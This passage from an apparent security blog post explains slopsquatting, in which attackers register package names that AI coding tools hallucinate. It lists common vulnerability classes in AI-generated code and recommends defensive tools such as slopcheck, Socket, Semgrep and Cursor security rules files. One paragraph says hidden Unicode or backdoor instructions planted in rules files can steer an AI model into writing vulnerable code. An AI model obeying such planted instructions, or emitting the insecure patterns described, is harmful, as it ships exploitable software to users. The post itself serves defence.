https://substackcdn.com/image/fetch/$s_!09o9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png 848w, https://substackcdn.com/image/fetch/$s_!09o9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png 1272w, https://substackcdn.com/image/fetch/$s_!09o9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!09o9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png" width="1189" height="992" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:992,&quot;width&quot;:1189,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:100556,&quot;alt&quot;:&quot;Defense Stack: Layer Map: Vibe coding defense stack showing four security layers &#8212; security rules files at code generation, slopcheck and Socket at install, Gitleaks at commit, and TruffleHog plus Semgrep at CI/CD.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Defense Stack: Layer Map: Vibe coding defense stack showing four security layers &#8212; security rules files at code generation, slopcheck and Socket at install, Gitleaks at commit, and TruffleHog plus Semgrep at CI/CD." title="Defense Stack: Layer Map: Vibe coding defense stack showing four security layers &#8212; security rules files at code generation, slopcheck and Socket at install, Gitleaks at commit, and TruffleHog plus Semgrep at CI/CD." srcset="https://substackcdn.com/image/fetch/$s_!09o9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png 424w, https://substackcdn.com/image/fetch/$s_!09o9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png 848w, https://substackcdn.com/image/fetch/$s_!09o9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png 1272w, https://substackcdn.com/image/fetch/$s_!09o9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19bdd1e1-9c0b-4f29-99fd-7225628a270a_1189x992.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>What Is Slopsquatting and How Does It Target Vibe Coders?</h2><p>Here&#8217;s a scenario every vibe coder should understand. You ask your AI coding assistant to build a FastAPI backend with MongoDB integration. The AI generates a <code>requirements.txt</code> that includes <code>fastapi-mongodb-helper</code>. Sounds right. You run <code>pip install</code>. The package exists on PyPI. It installs cleanly.</p><p>The problem: <code>fastapi-mongodb-helper</code> was never a real package. The AI hallucinated the name, mashing together real concepts into a plausible-sounding dependency that didn&#8217;t exist, until an attacker registered it. That&#8217;s <a href="https://www.toxsec.com/p/distillation-raids-slopsquatting">slopsquatting</a>, a supply chain attack where adversaries pre-register the package names that AI coding tools consistently hallucinate.</p><p>The hallucinations aren&#8217;t random. Ask the same model the same question ten times and a huge chunk of the fabricated package names repeat every single run. Predictable means weaponizable.</p><p>This is already happening in the wild. An npm package called <code>react-codeshift</code> appeared in early 2026, a name no human created. It was a hallucination mashup of two real packages (<code>jscodeshift</code> and <code>react-codemod</code>) that propagated to 237 repositories through forks, got translated into Japanese, and was still receiving daily download attempts from AI agents. Nobody planted it deliberately. The attack surface grew on its own.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!--JH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!--JH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png 424w, https://substackcdn.com/image/fetch/$s_!--JH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png 848w, https://substackcdn.com/image/fetch/$s_!--JH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png 1272w, https://substackcdn.com/image/fetch/$s_!--JH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!--JH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png" width="1299" height="931" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:931,&quot;width&quot;:1299,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:111507,&quot;alt&quot;:&quot;Slopsquatting: Attack Chain: Slopsquatting attack chain diagram showing AI hallucinating a package name, attacker registering it on PyPI, and developer installing malicious code, with slopcheck intercept point blocking the install.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Slopsquatting: Attack Chain: Slopsquatting attack chain diagram showing AI hallucinating a package name, attacker registering it on PyPI, and developer installing malicious code, with slopcheck intercept point blocking the install." title="Slopsquatting: Attack Chain: Slopsquatting attack chain diagram showing AI hallucinating a package name, attacker registering it on PyPI, and developer installing malicious code, with slopcheck intercept point blocking the install." srcset="https://substackcdn.com/image/fetch/$s_!--JH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png 424w, https://substackcdn.com/image/fetch/$s_!--JH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png 848w, https://substackcdn.com/image/fetch/$s_!--JH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png 1272w, https://substackcdn.com/image/fetch/$s_!--JH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3bc26f6c-30e6-4633-8129-eedad99e2efc_1299x931.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>The fix has three layers.</strong></p><p><strong>Catch hallucinated packages before they install.</strong> <a href="https://github.com/0xToxSec/slopcheck">slopcheck</a> is a free, open-source CLI built specifically for this problem. Point it at your project directory and it scans every dependency file (<code>requirements.txt</code>, <code>package.json</code>, <code>Cargo.toml</code>, <code>go.mod</code>, <code>Gemfile</code>, <code>pom.xml</code>) against live registries. If a package doesn&#8217;t exist, slopcheck flags it as slop. If it exists but was created in the last seven days, has under 100 downloads, or matches hallucination naming patterns like <code>{popular-lib}-helper</code> or <code>{popular-lib}-utils</code>, it flags it as suspicious.</p><p>The best part: <code>slopcheck install</code> wraps your real package manager. Instead of <code>pip install flask requests sketchy-package</code>, run <code>slopcheck install flask requests sketchy-package</code>. Clean packages install normally. Slop gets blocked. Always. Run <code>slopcheck init</code> to set up a pre-commit hook and hallucinated packages never enter your repo. One command, and the most dangerous class of AI supply chain attacks dies before <code>pip</code> ever fires.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2Ptm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2Ptm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png 424w, https://substackcdn.com/image/fetch/$s_!2Ptm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png 848w, https://substackcdn.com/image/fetch/$s_!2Ptm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png 1272w, https://substackcdn.com/image/fetch/$s_!2Ptm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2Ptm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png" width="914" height="798" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:798,&quot;width&quot;:914,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:57441,&quot;alt&quot;:&quot;Slopsquatting: slopcheck: slopcheck terminal output scanning a requirements.txt file, flagging two hallucinated packages as SLOP, one suspicious new package as SUS, and five legitimate packages as OK.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Slopsquatting: slopcheck: slopcheck terminal output scanning a requirements.txt file, flagging two hallucinated packages as SLOP, one suspicious new package as SUS, and five legitimate packages as OK." title="Slopsquatting: slopcheck: slopcheck terminal output scanning a requirements.txt file, flagging two hallucinated packages as SLOP, one suspicious new package as SUS, and five legitimate packages as OK." srcset="https://substackcdn.com/image/fetch/$s_!2Ptm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png 424w, https://substackcdn.com/image/fetch/$s_!2Ptm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png 848w, https://substackcdn.com/image/fetch/$s_!2Ptm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png 1272w, https://substackcdn.com/image/fetch/$s_!2Ptm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F69c734a3-acff-4987-9a18-b0201f39fcb8_914x798.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Monitor for deeper supply chain threats.</strong> <a href="https://socket.dev">Socket</a> provides a free browser extension and CLI tool that goes beyond existence checks. It performs deep package inspection, monitoring for <a href="https://www.toxsec.com/p/ibm-x-force-2026-confirms-ai-supercharged">70+ signals of supply chain risk</a> including obfuscated code, suspicious network activity, and install scripts that fire on import. Alias it to your package manager (<code>alias npm="socket npm"</code>) and every install gets behavioral analysis alongside the registry check. Where slopcheck catches packages that shouldn&#8217;t exist, Socket catches packages that exist but shouldn&#8217;t be trusted.</p><p><strong>Lock and audit.</strong> Use <code>package-lock.json</code> for npm or <code>poetry.lock</code> for Python. Lockfiles pin exact versions and prevent silent package substitution. Commit them. Every time. Run <code>npm audit</code> and <code>pip audit</code> regularly to catch known-vulnerable real packages that the AI pulled in without checking the CVE list.</p><p>The mindset shift: treat every AI-suggested dependency like a package from an untrusted stranger, because that&#8217;s exactly what it might be. The AI has no concept of package provenance. It doesn&#8217;t know who published a library, when it was last updated, or whether it phones home to a command-and-control server. Cross-ecosystem hallucinations make this worse: the AI knows a Python concept exists, invents a package name for it, and that name turns out to be a real, unrelated JavaScript package. Wrong ecosystem, wrong code, potential backdoor.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>What Insecure Code Patterns Does AI Generate Most Often?</h2><p>The third pitfall is the broadest: the actual code the AI writes contains security vulnerabilities. It learned from millions of public repositories where insecure patterns are the norm, and it reproduces them faithfully.</p><p><strong>Missing input sanitization</strong> is the most frequent offender. The AI generates a form handler or API endpoint that takes user input and passes it directly to a database query, a shell command, or an HTML template without cleaning it first. That&#8217;s how you get SQL injection (SQLi, where an attacker sends database commands through a form field), cross-site scripting (XSS, where malicious JavaScript gets injected into pages other users see), and command injection (where user input gets executed as a system command). The AI doesn&#8217;t sanitize because the code it learned from didn&#8217;t sanitize.</p><p><strong>Broken authentication and session handling</strong> ship just as quietly. When you ask the AI to scaffold a user management dashboard, it builds the feature: CRUD operations, role assignment, user creation. What it doesn&#8217;t build is the middleware that checks whether the person making the request is actually authorized. Auth middleware, the gate in front of the feature, gets skipped because the AI has no context for how your app verifies identity. That&#8217;s <a href="https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos">broken access control</a>, OWASP&#8217;s number one web application security risk.</p><p><strong>Insecure deserialization, weak crypto defaults, and error messages that leak internals</strong> round out the hit list. AI models default to whatever the training data used most often, which frequently means MD5 instead of bcrypt for password hashing (MD5 was broken years ago), <code>pickle.loads()</code> on untrusted data in Python (which executes arbitrary code), and detailed stack traces returned to end users (which tell attackers exactly what framework, database, and file paths your app uses).</p><p><strong>Logic flaws</strong> are the sneakiest category. These are bugs that don&#8217;t show up in a static scan because the code is syntactically correct. They only appear under specific inputs or load conditions: a race condition in a payment flow that lets someone pay for a $100 item and get charged $0, or an authorization check that works for direct API calls but not for the same action triggered through a webhook. Enrichlead learned this the hard way: an AI built their entire lead-generation platform in Cursor, putting all security logic on the client side. Within 72 hours of launch, users changed a single value in the browser console to bypass payment entirely. 15,000 lines of AI-generated code, no way to audit it, project dead. These take human review or dynamic testing to catch, which brings us to the tooling that actually scales.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9cRC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9cRC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png 424w, https://substackcdn.com/image/fetch/$s_!9cRC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png 848w, https://substackcdn.com/image/fetch/$s_!9cRC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png 1272w, https://substackcdn.com/image/fetch/$s_!9cRC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9cRC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png" width="846" height="978" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:978,&quot;width&quot;:846,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:97451,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/192970872?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9cRC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png 424w, https://substackcdn.com/image/fetch/$s_!9cRC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png 848w, https://substackcdn.com/image/fetch/$s_!9cRC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png 1272w, https://substackcdn.com/image/fetch/$s_!9cRC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e52d3ec-7ba3-4630-97a0-d7c68436783c_846x978.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>How Do Security Rules Files and Semgrep Prevent Insecure AI Code?</h2><p>The tooling answer to insecure code patterns comes in two parts: telling the AI what not to generate, and scanning what it generates anyway.</p><p><strong>Security rules files</strong> are the first line of defense. If you&#8217;re using Cursor, you already have access to the <code>.cursor/rules/</code> system (or the legacy <code>.cursorrules</code> file). These are instruction files that the AI reads before generating any code. They persist across every prompt, every session. A security rules file tells the AI: always use parameterized queries for SQL, never hardcode credentials, always validate and sanitize user input, never use <code>eval()</code>, require authentication middleware on every route.</p><p>Open-source security rule collections already exist on GitHub (check <code>matank001/cursor-security-rules</code> and <code>PatrickJS/awesome-cursorrules</code>), and the <a href="https://www.toxsec.com/p/secure-your-mcp">Cloud Security Alliance has a full framework</a> for writing security-focused Cursor rules. The setup is copy-paste: drop the rules file into your <code>.cursor/rules/</code> directory, and every code generation request passes through your security guardrails first.</p><p>One critical caveat: security rules files are only as trustworthy as their source. Researchers have demonstrated that malicious actors can inject hidden Unicode characters or backdoor instructions into rule files that cause the AI to generate vulnerable code without the developer noticing. Treat your rules files like production code. Review them, version-control them, and never copy rules from untrusted sources without reading every line.</p><p><strong>Semgrep</strong> is the second line. It&#8217;s an open-source static analysis tool with 5,000+ security rules that scans code for known vulnerability patterns. What makes it powerful for vibe coding in 2026 is the MCP (Model Context Protocol) integration: you can wire Semgrep directly into Cursor, Windsurf, VS Code, or any MCP-compatible IDE so that every chunk of code the AI generates gets scanned before you accept it. The AI writes code, Semgrep flags vulnerabilities, the AI fixes them, and Semgrep verifies the fix. The loop runs inside your editor. You never leave the flow.</p><p>Semgrep also recently shipped <a href="https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio">Cursor Hooks</a>, which fire a scan automatically when the agent completes its loop. No developer opt-in required. The agent generates, Semgrep validates, and unsafe code gets rejected before it touches your codebase. For teams, the Cloud Distribution feature pushes preconfigured hooks to every developer machine. Security becomes deterministic instead of optional.</p><p>Rules files reduce the probability of insecure code being generated. Semgrep catches what slips through. Both are free.</p><p>For the solo vibe coder who wants maximum coverage with minimum friction, the stack looks like this: drop a security rules file into <code>.cursor/rules/</code>, install the <a href="https://github.com/semgrep/mcp">Semgrep MCP server</a> with <code>pipx install semgrep-mcp</code>, and add the instruction &#8220;Always scan code generated using Semgrep for security 